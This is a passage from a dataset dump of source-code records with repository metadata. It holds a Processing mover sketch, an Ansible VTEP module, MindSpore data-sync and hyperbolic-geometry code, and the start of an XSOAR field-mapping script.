\"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"sketches/natureOfCode/chapter01/mover/mover.py"},"max_forks_repo_name":{"kind":"string","value":"kantel/processingpy"},"max_forks_repo_head_hexsha":{"kind":"string","value":"74aae222e46f68d1c8f06307aaede3cdae65c8ec"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":3,"string":"3"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2019-12-23T19:12:51.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2021-04-30T14:00:31.000Z"},"content":{"kind":"string","value":"class Mover(object):\n \n def __init__(self):\n self.location = PVector(random(width), random(height))\n self.velocity = PVector(random(-5, 5), random(-5, 5))\n self.r = 15\n \n def update(self):\n self.location.add(self.velocity)\n \n def display(self):\n stroke(0)\n fill(255, 100, 255)\n ellipse(self.location.x, self.location.y, 2*self.r, 2*self.r)\n \n def checkBoundaries(self):\n if (self.location.x > width + self.r):\n self.location.x = -self.r\n elif (self.location.x < -self.r):\n self.location.x = width + self.r\n \n if (self.location.y > height + self.r):\n self.location.y = -self.r\n elif (self.location.y < -self.r):\n self.location.y = height + self.r\n \n \n \n"},"avg_line_length":{"kind":"number","value":28.2068965517,"string":"28.206897"},"max_line_length":{"kind":"number","value":69,"string":"69"},"alphanum_fraction":{"kind":"number","value":0.5305623472,"string":"0.530562"}}},{"rowIdx":46360,"cells":{"hexsha":{"kind":"string","value":"919f35df2425fa45d68a62ff250d7f7259d01c3d"},"size":{"kind":"number","value":5345,"string":"5,345"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/pn_vtep.py"},"max_stars_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_stars_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/pn_vtep.py"},"max_issues_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_issues_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/pn_vtep.py"},"max_forks_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_forks_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"#!/usr/bin/python\n# Copyright: (c) 2018, Pluribus Networks\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\n\nDOCUMENTATION = '''\n---\nmodule: pn_vtep\nauthor: \"Pluribus Networks (@rajaspachipulusu17)\"\nshort_description: CLI command to create/delete vtep\ndescription:\n - This module can be used to create a vtep and delete a vtep.\noptions:\n pn_cliswitch:\n description:\n - Target switch to run the CLI on.\n required: false\n type: str\n state:\n description:\n - vtep configuration command.\n required: false\n choices: ['present', 'absent']\n type: str\n default: 'present'\n pn_name:\n description:\n - vtep name.\n required: false\n type: str\n pn_ip:\n description:\n - Primary IP address.\n required: false\n type: str\n pn_vrouter_name:\n description:\n - name of the vrouter service.\n required: false\n type: str\n pn_virtual_ip:\n description:\n - Virtual/Secondary IP address.\n required: false\n type: str\n pn_location:\n description:\n - switch name.\n required: false\n type: str\n pn_switch_in_cluster:\n description:\n - Tells whether switch in cluster or not.\n required: false\n type: bool\n default: True\n'''\n\nEXAMPLES = \"\"\"\n- name: create vtep\n pn_vtep:\n pn_cliswitch: 'sw01'\n pn_name: 'foo'\n pn_vrouter_name: 'foo-vrouter'\n pn_ip: '22.22.22.2'\n pn_location: 'sw01'\n pn_virtual_ip: \"22.22.22.1\"\n\n- name: delete vtep\n pn_vtep:\n pn_cliswitch: 'sw01'\n state: 'absent'\n pn_name: 'foo'\n\"\"\"\n\nRETURN = \"\"\"\ncommand:\n description: the CLI command run on the target node.\n returned: always\n type: str\nstdout:\n description: set of responses from the vtep command.\n returned: always\n type: list\nstderr:\n description: set of error responses from the vtep command.\n returned: on error\n type: list\nchanged:\n description: indicates whether the CLI caused changes on the target.\n returned: always\n type: bool\n\"\"\"\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible_collections.community.general.plugins.module_utils.network.netvisor.pn_nvos import pn_cli, run_cli\nfrom ansible_collections.community.general.plugins.module_utils.network.netvisor.netvisor import run_commands\n\n\ndef check_cli(module, cli):\n \"\"\"\n This method checks for idempotency using the vtep-show command.\n If a name exists, return True if name exists else False.\n :param module: The Ansible module to fetch input parameters\n :param cli: The CLI string\n \"\"\"\n name = module.params['pn_name']\n\n cli += ' vtep-show format name no-show-headers'\n out = run_commands(module, cli)[1]\n\n if out:\n out = out.split()\n\n return True if name in out else False\n\n\ndef main():\n \"\"\" This section is for arguments parsing \"\"\"\n\n state_map = dict(\n present='vtep-create',\n absent='vtep-delete'\n )\n\n argument_spec = dict(\n pn_cliswitch=dict(required=False, type='str'),\n state=dict(required=False, type='str', choices=state_map.keys(), default='present'),\n pn_name=dict(required=False, type='str'),\n pn_ip=dict(required=False, type='str'),\n pn_vrouter_name=dict(required=False, type='str'),\n pn_virtual_ip=dict(required=False, type='str'),\n pn_location=dict(required=False, type='str'),\n pn_switch_in_cluster=dict(required=False, type='bool', default='True')\n )\n\n module = AnsibleModule(\n argument_spec=argument_spec,\n required_if=(\n [\"state\", \"present\", [\"pn_name\", \"pn_ip\", \"pn_vrouter_name\", \"pn_location\"]],\n [\"state\", \"absent\", [\"pn_name\"]],\n ),\n )\n\n # Accessing the arguments\n cliswitch = module.params['pn_cliswitch']\n state = module.params['state']\n name = module.params['pn_name']\n ip = module.params['pn_ip']\n vrouter_name = module.params['pn_vrouter_name']\n virtual_ip = module.params['pn_virtual_ip']\n location = module.params['pn_location']\n switch_in_cluster = module.params['pn_switch_in_cluster']\n\n if switch_in_cluster and not virtual_ip and state == 'present':\n module.exit_json(\n failed=True,\n msg='virtual ip is required when switch is in cluster'\n )\n\n command = state_map[state]\n\n # Building the CLI command string\n cli = pn_cli(module, cliswitch)\n\n NAME_EXISTS = check_cli(module, cli)\n\n cli += ' %s name %s ' % (command, name)\n\n if command == 'vtep-delete':\n if NAME_EXISTS is False:\n module.exit_json(\n skipped=True,\n msg='vtep with name %s does not exist' % name\n )\n\n if command == 'vtep-create':\n if NAME_EXISTS is True:\n module.exit_json(\n skipped=True,\n msg='vtpe with name %s already exists' % name\n )\n\n cli += 'vrouter-name %s ' % vrouter_name\n cli += 'ip %s ' % ip\n cli += 'location %s ' % location\n\n if virtual_ip:\n cli += 'virtual-ip %s ' % virtual_ip\n\n run_cli(module, cli, state_map)\n\n\nif __name__ == '__main__':\n main()\n"},"avg_line_length":{"kind":"number","value":26.2009803922,"string":"26.20098"},"max_line_length":{"kind":"number","value":111,"string":"111"},"alphanum_fraction":{"kind":"number","value":0.6400374181,"string":"0.640037"}}},{"rowIdx":46361,"cells":{"hexsha":{"kind":"string","value":"37d2717e8b3e1fa56c025383d7488218b1e125ca"},"size":{"kind":"number","value":2176,"string":"2,176"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"research/cv/swin_transformer/src/data/data_utils/moxing_adapter.py"},"max_stars_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_stars_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_stars_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_stars_count":{"kind":"number","value":77,"string":"77"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-10-15T08:32:37.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-30T13:09:11.000Z"},"max_issues_repo_path":{"kind":"string","value":"research/cv/swin_transformer/src/data/data_utils/moxing_adapter.py"},"max_issues_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_issues_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_issues_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_issues_count":{"kind":"number","value":3,"string":"3"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2021-10-30T14:44:57.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-02-14T06:57:57.000Z"},"max_forks_repo_path":{"kind":"string","value":"research/cv/swin_transformer/src/data/data_utils/moxing_adapter.py"},"max_forks_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_forks_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_forks_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_forks_count":{"kind":"number","value":24,"string":"24"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2021-10-15T08:32:45.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-24T18:45:20.000Z"},"content":{"kind":"string","value":"# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\n\"\"\"Moxing adapter for ModelArts\"\"\"\n\nimport os\n\n_global_sync_count = 0\n\n\ndef get_device_id():\n device_id = os.getenv('DEVICE_ID', '0')\n return int(device_id)\n\n\ndef get_device_num():\n device_num = os.getenv('RANK_SIZE', '1')\n return int(device_num)\n\n\ndef get_rank_id():\n global_rank_id = os.getenv('RANK_ID', '0')\n return int(global_rank_id)\n\n\ndef get_job_id():\n job_id = os.getenv('JOB_ID')\n job_id = job_id if job_id != \"\" else \"default\"\n return job_id\n\n\ndef sync_data(from_path, to_path, threads=16):\n \"\"\"\n Download data from remote obs to local directory if the first url is remote url and the second one is local path\n Upload data from local directory to remote obs in contrast.\n \"\"\"\n import moxing as mox\n import time\n global _global_sync_count\n sync_lock = \"/tmp/copy_sync.lock\" + str(_global_sync_count)\n _global_sync_count += 1\n\n # Each server contains 8 devices as most.\n if get_device_id() % min(get_device_num(), 8) == 0 and not os.path.exists(sync_lock):\n print(\"from path: \", from_path)\n print(\"to path: \", to_path)\n mox.file.copy_parallel(from_path, to_path, threads=threads)\n print(\"===finish data synchronization===\")\n try:\n os.mknod(sync_lock)\n except IOError:\n pass\n print(\"===save flag===\")\n\n while True:\n if os.path.exists(sync_lock):\n break\n time.sleep(1)\n\n print(\"Finish sync data from {} to {}.\".format(from_path, to_path))\n"},"avg_line_length":{"kind":"number","value":29.8082191781,"string":"29.808219"},"max_line_length":{"kind":"number","value":116,"string":"116"},"alphanum_fraction":{"kind":"number","value":0.6530330882,"string":"0.653033"}}},{"rowIdx":46362,"cells":{"hexsha":{"kind":"string","value":"f4352e3f34ff59bdfc8dd2bfbaf3ca6bfe02756d"},"size":{"kind":"number","value":8596,"string":"8,596"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"research/nlp/hypertext/src/poincare.py"},"max_stars_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_stars_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_stars_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_stars_count":{"kind":"number","value":77,"string":"77"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-10-15T08:32:37.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-30T13:09:11.000Z"},"max_issues_repo_path":{"kind":"string","value":"research/nlp/hypertext/src/poincare.py"},"max_issues_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_issues_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_issues_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_issues_count":{"kind":"number","value":3,"string":"3"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2021-10-30T14:44:57.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-02-14T06:57:57.000Z"},"max_forks_repo_path":{"kind":"string","value":"research/nlp/hypertext/src/poincare.py"},"max_forks_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_forks_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_forks_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_forks_count":{"kind":"number","value":24,"string":"24"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2021-10-15T08:32:45.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-24T18:45:20.000Z"},"content":{"kind":"string","value":"# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"poincare file\"\"\"\nimport mindspore.numpy as mnp\nfrom mindspore.nn import Cell, Norm\nfrom mindspore.ops import Shape, ReduceSum, Sqrt, ExpandDims, Tanh, Transpose, matmul, Pow, Reshape, clip_by_value\nimport mindspore.common.dtype as mstype\nfrom src.math_utils import Artanh\n\n\n\nclass LorentzFactors(Cell):\n \"\"\"lorentz_factors class\"\"\"\n\n def __init__(self, min_norm):\n \"\"\"init\"\"\"\n super(LorentzFactors, self).__init__()\n self.min_norm = min_norm\n self.norm = Norm(axis=-1)\n\n def construct(self, x):\n \"\"\"class construction\"\"\"\n x_norm = self.norm(x)\n return 1.0 / (1.0 - x_norm ** 2 + self.min_norm)\n\n\nclass ClampMin(Cell):\n \"\"\"clamp_min class\"\"\"\n\n def __init__(self):\n \"\"\"init fun\"\"\"\n super(ClampMin, self).__init__()\n self.shape = Shape()\n\n def construct(self, tensor, min1):\n \"\"\"class construction\"\"\"\n min_mask = (tensor <= min1)\n min_mask1 = (tensor >= min1)\n min_add = mnp.ones(self.shape(tensor)) * min1 * min_mask\n return tensor * min_mask1 + min_add\n\n\nclass Proj(Cell):\n \"\"\"proj class\"\"\"\n\n def __init__(self, min_norm):\n \"\"\"init fun\"\"\"\n super(Proj, self).__init__()\n self.clamp_min = ClampMin()\n self.min_norm = min_norm\n self.norm_k = Norm(axis=-1, keep_dims=True)\n self.maxnorm = 1 - 4e-3\n\n def construct(self, x, c):\n \"\"\"class construction\"\"\"\n norm = self.clamp_min(self.norm_k(x), self.min_norm)\n maxnorm = self.maxnorm / (c ** 0.5)\n cond = norm > maxnorm\n projected = x / norm * maxnorm\n return mnp.where(cond, projected, x)\n\n\nclass Clamp(Cell):\n \"\"\"clamp class\"\"\"\n\n def __init__(self):\n super(Clamp, self).__init__()\n self.shape = Shape()\n\n def construct(self, tensor, min1, max1):\n \"\"\"class construction\"\"\"\n return clip_by_value(tensor, min1, max1)\n\n\nclass Logmap0(Cell):\n \"\"\"logmap0 class\"\"\"\n\n def __init__(self, min_norm):\n \"\"\"init fun\"\"\"\n super(Logmap0, self).__init__()\n self.min_norm = min_norm\n self.norm_k = Norm(axis=-1, keep_dims=True)\n self.artanh = Artanh()\n self.norm_k = Norm(axis=-1, keep_dims=True)\n self.clamp_min = ClampMin()\n\n def construct(self, p, c):\n \"\"\"class construction\"\"\"\n sqrt_c = c ** 0.5\n p_norm = self.clamp_min(self.norm_k(p), self.min_norm)\n scale = 1. / sqrt_c * self.artanh(sqrt_c * p_norm) / p_norm\n return scale * p\n\n\nclass KleinToPoincare(Cell):\n \"\"\"klein to poincare class\"\"\"\n\n def __init__(self, min_norm):\n \"\"\"init\"\"\"\n super(KleinToPoincare, self).__init__()\n self.min_norm = min_norm\n self.sqrt = Sqrt()\n self.sum = ReduceSum(keep_dims=True)\n self.proj = Proj(self.min_norm)\n\n def construct(self, x, c):\n \"\"\"class construction\"\"\"\n x_poincare = x / (1.0 + self.sqrt(1.0 - self.sum(x * x, -1)))\n x_poincare = self.proj(x_poincare, c)\n return x_poincare\n\n\nclass ToKlein(Cell):\n \"\"\"to klein class\"\"\"\n\n def __init__(self, min_norm):\n \"\"\"init fun\"\"\"\n super(ToKlein, self).__init__()\n self.min_norm = min_norm\n self.sum = ReduceSum(keep_dims=True)\n self.klein_constraint = KleinConstraint(self.min_norm)\n\n def construct(self, x, c):\n \"\"\"class construction\"\"\"\n x_2 = self.sum(x * x, -1)\n x_klein = 2 * x / (1.0 + x_2)\n x_klein = self.klein_constraint(x_klein)\n return x_klein\n\n\nclass KleinConstraint(Cell):\n \"\"\"klein constraint class\"\"\"\n\n def __init__(self, min_norm):\n \"\"\"init fun\"\"\"\n super(KleinConstraint, self).__init__()\n self.norm = Norm(axis=-1)\n self.min_norm = min_norm\n self.maxnorm = 1 - 4e-3\n self.shape = Shape()\n self.reshape = Reshape()\n\n def construct(self, x):\n \"\"\"class construction\"\"\"\n last_dim_val = self.shape(x)[-1]\n norm = self.reshape(self.norm(x), (-1, 1))\n maxnorm = self.maxnorm\n cond = norm > maxnorm\n x_reshape = self.reshape(x, (-1, last_dim_val))\n projected = x_reshape / (norm + self.min_norm) * maxnorm\n x_reshape = mnp.where(cond, projected, x_reshape)\n x = self.reshape(x_reshape, self.shape(x))\n return x\n\n\nclass EinsteinMidpoint(Cell):\n \"\"\"einstein mindpoint class\"\"\"\n\n def __init__(self, min_norm):\n \"\"\"init fun\"\"\"\n super(EinsteinMidpoint, self).__init__()\n self.to_klein = ToKlein(min_norm)\n self.lorentz_factors = LorentzFactors(min_norm)\n self.sum = ReduceSum(keep_dims=True)\n self.unsqueeze = ExpandDims()\n self.sumFalse = ReduceSum(keep_dims=False)\n self.klein_constraint = KleinConstraint(min_norm)\n self.klein_to_poincare = KleinToPoincare(min_norm)\n\n def construct(self, x, c):\n \"\"\"class construction\"\"\"\n x = self.to_klein(x, c)\n x_lorentz = self.lorentz_factors(x)\n x_norm = mnp.norm(x, axis=-1)\n # deal with pad value\n x_lorentz = (1.0 - (x_norm == 0.0).astype(mstype.float32)) * x_lorentz\n x_lorentz_sum = self.sum(x_lorentz, -1)\n x_lorentz_expand = self.unsqueeze(x_lorentz, -1)\n x_midpoint = self.sumFalse(x_lorentz_expand * x, 1) / x_lorentz_sum\n x_midpoint = self.klein_constraint(x_midpoint)\n x_p = self.klein_to_poincare(x_midpoint, c)\n return x_p\n\n\nclass ClampTanh(Cell):\n \"\"\"clamp tanh class\"\"\"\n\n def __init__(self):\n \"\"\"init fun\"\"\"\n super(ClampTanh, self).__init__()\n self.clamp = Clamp()\n self.tanh = Tanh()\n\n def construct(self, x, c=15):\n \"\"\"class construction\"\"\"\n return self.tanh(self.clamp(x, -c, c))\n\n\nclass MobiusMatvec(Cell):\n \"\"\"mobius matvec class\"\"\"\n\n def __init__(self, min_norm):\n \"\"\"init fun\"\"\"\n super(MobiusMatvec, self).__init__()\n self.min_norm = min_norm\n self.norm_k = Norm(axis=-1, keep_dims=True)\n self.artanh = Artanh()\n self.norm_k = Norm(axis=-1, keep_dims=True)\n self.clamp_min = ClampMin()\n self.transpose = Transpose()\n self.clamp_tanh = ClampTanh()\n\n def construct(self, m, x, c):\n \"\"\"class construction\"\"\"\n sqrt_c = c ** 0.5\n x_norm = self.clamp_min(self.norm_k(x), self.min_norm)\n mx = matmul(x, self.transpose(m, (1, 0)))\n mx_norm = self.clamp_min(self.norm_k(x), self.min_norm)\n t1 = self.artanh(sqrt_c * x_norm)\n t2 = self.clamp_tanh(mx_norm / x_norm * t1)\n res_c = t2 * mx / (mx_norm * sqrt_c)\n cond = mnp.array([[0]] * len(mx))\n res_0 = mnp.zeros(1)\n res = mnp.where(cond, res_0, res_c)\n return res\n\n\nclass Expmap0(Cell):\n \"\"\"expmap0 class\"\"\"\n\n def __init__(self, min_norm):\n \"\"\"init fun\"\"\"\n super(Expmap0, self).__init__()\n self.clamp_min = ClampMin()\n self.min_norm = min_norm\n self.clamp_tanh = ClampTanh()\n self.norm_k = Norm(axis=-1, keep_dims=True)\n\n def construct(self, u, c):\n \"\"\"constructfun\"\"\"\n sqrt_c = c ** 0.5\n u_norm = self.clamp_min(self.norm_k(u), self.min_norm)\n gamma_1 = self.clamp_tanh(sqrt_c * u_norm) * u / (sqrt_c * u_norm)\n return gamma_1\n\n\nclass MobiusAdd(Cell):\n \"\"\"mobius add\"\"\"\n\n def __init__(self, min_norm):\n \"\"\"init fun\"\"\"\n super(MobiusAdd, self).__init__()\n self.pow = Pow()\n self.sum = ReduceSum(keep_dims=True)\n self.clamp_min = ClampMin()\n self.min_norm = min_norm\n\n def construct(self, x, y, c, dim=-1):\n \"\"\"constructfun\"\"\"\n x2 = self.sum(self.pow(x, 2), dim)\n y2 = self.sum(self.pow(y, 2), dim)\n xy = self.sum(x * y, dim)\n num = (1 + 2 * c * xy + c * y2) * x + (1 - c * x2) * y\n denom = 1 + 2 * c * xy + c ** 2 * x2 * y2\n return num / self.clamp_min(denom, self.min_norm)\n"},"avg_line_length":{"kind":"number","value":30.9208633094,"string":"30.920863"},"max_line_length":{"kind":"number","value":114,"string":"114"},"alphanum_fraction":{"kind":"number","value":0.5916705444,"string":"0.591671"}}},{"rowIdx":46363,"cells":{"hexsha":{"kind":"string","value":"be9a0ae08e5d2b0cf33ab9e197160664f5587480"},"size":{"kind":"number","value":31571,"string":"31,571"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Packs/Base/Scripts/DBotSuggestClassifierMapping/DBotSuggestClassifierMapping.py"},"max_stars_repo_name":{"kind":"string","value":"diCagri/content"},"max_stars_repo_head_hexsha":{"kind":"string","value":"c532c50b213e6dddb8ae6a378d6d09198e08fc9f"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":799,"string":"799"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2016-08-02T06:43:14.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-31T11:10:11.000Z"},"max_issues_repo_path":{"kind":"string","value":"Packs/Base/Scripts/DBotSuggestClassifierMapping/DBotSuggestClassifierMapping.py"},"max_issues_repo_name":{"kind":"string","value":"diCagri/content"},"max_issues_repo_head_hexsha":{"kind":"string","value":"c532c50b213e6dddb8ae6a378d6d09198e08fc9f"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":9317,"string":"9,317"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2016-08-07T19:00:51.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-03-31T21:56:04.000Z"},"max_forks_repo_path":{"kind":"string","value":"Packs/Base/Scripts/DBotSuggestClassifierMapping/DBotSuggestClassifierMapping.py"},"max_forks_repo_name":{"kind":"string","value":"diCagri/content"},"max_forks_repo_head_hexsha":{"kind":"string","value":"c532c50b213e6dddb8ae6a378d6d09198e08fc9f"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":1297,"string":"1,297"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2016-08-04T13:59:00.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-31T23:43:06.000Z"},"content":{"kind":"string","value":"from CommonServerPython import *\n\nimport itertools\nimport numbers\nimport re\nimport socket\nfrom collections import Counter\nfrom collections import OrderedDict\nfrom datetime import datetime, timedelta\n\nINCIDENT_FIELD_NAME = \"name\"\nINCIDENT_FIELD_MACHINE_NAME = \"cliName\"\nINCIDENT_FIELD_SYSTEM = \"system\"\n\nSAMPLES_INCOMING = 'incomingSamples'\nSAMPLES_SCHEME = 'scheme'\nSAMPLES_OUTGOING = 'outgoingSamples'\n\nCOUNT_KEYWORD = \"count\"\n\nSIEM_FIELDS = {'Account ID': {'aliases': ['accountid', 'account id'],\n 'validators': []},\n 'Account Name': {'aliases': ['accountname', 'account name'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n 'Account Type': {'aliases': ['accounttype', 'account type'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Agent ID': {'aliases': ['agentid', 'agent id', 'sensor id', 'tenant id'],\n 'validators': []},\n\n 'Tenant Name': {'aliases': ['tenant name', 'tenant name'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'App': {'aliases': ['app', 'app'], 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Attachment Name': {'aliases': ['attachmentname', 'attachment name'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Blocked Action': {'aliases': ['blockedaction', 'blocked action', 'prevention mode'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'City': {'aliases': ['city'], 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Command Line': {'aliases': ['commandline', 'command line', 'cmdline', 'cmd line', 'process file name',\n 'process file path',\n 'process full path', 'process full path', 'cmd'],\n 'validators': ['validate_file_full_path']},\n\n 'Event ID': {'aliases': ['eventid', 'event id', 'alert id', 'offense id'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n 'Event Type': {'aliases': ['eventtype', 'event type', 'alert type'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Company Name': {'aliases': ['companyname',\n 'company name',\n 'company',\n 'customer'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Country': {'aliases': ['country', 'country name'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Critical Assets': {'aliases': ['criticalassets', 'critical assets'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Description': {'aliases': ['description'], 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Destination IP': {'aliases': ['destinationip',\n 'destination ip',\n 'destination address',\n 'dest ip',\n 'dest address',\n 'target address',\n 'dst'],\n 'validators': ['validate_ip']},\n 'Destination Port': {'aliases': ['destinationport',\n 'destination port',\n 'dst port',\n 'dest port'],\n 'validators': ['validate_number']},\n\n 'Email BCC': {'aliases': ['emailbcc', 'email bcc', 'bcc recipient', 'bcc'],\n 'validators': ['validate_email']},\n\n 'Email Body': {'aliases': ['emailbody', 'email body', 'body'],\n 'validators': []},\n 'Email Body Format': {'aliases': ['emailbodyformat',\n 'email body format',\n 'body type',\n 'body content type'],\n 'validators': []},\n 'Email Body HTML': {'aliases': ['emailbodyhtml', 'email body html'],\n 'validators': []},\n\n 'Email CC': {'aliases': ['emailcc', 'email cc', 'cc recipient', 'cc'],\n 'validators': ['validate_email']},\n\n 'Email From': {'aliases': ['emailfrom', 'email from', 'from'],\n 'validators': ['validate_email']},\n\n 'Email HTML': {'aliases': ['emailhtml', 'email html'], 'validators': []},\n\n 'Email Headers': {'aliases': ['emailheaders', 'email headers', 'headers', 'message headers',\n 'internet message header'],\n 'validators': ['']},\n\n 'Email In Reply To': {'aliases': ['emailinreplyto', 'email in reply to'],\n 'validators': []},\n\n 'Email Received': {'aliases': ['emailreceived',\n 'email received',\n 'received date time',\n 'received time'],\n 'validators': ['validate_date']},\n\n 'Email Reply To': {'aliases': ['emailreplyto', 'email replay to', 'reply to'],\n 'validators': []},\n\n 'Email Sender IP': {'aliases': ['emailsenderip', 'email sender ip'],\n 'validators': ['validate_ip']},\n\n 'Email Size': {'aliases': ['emailsize', 'email size'], 'validators': ['validate_number']},\n\n 'Email Subject': {'aliases': ['emailsubject', 'email subject', 'subject'],\n 'validators': []},\n\n 'Email To': 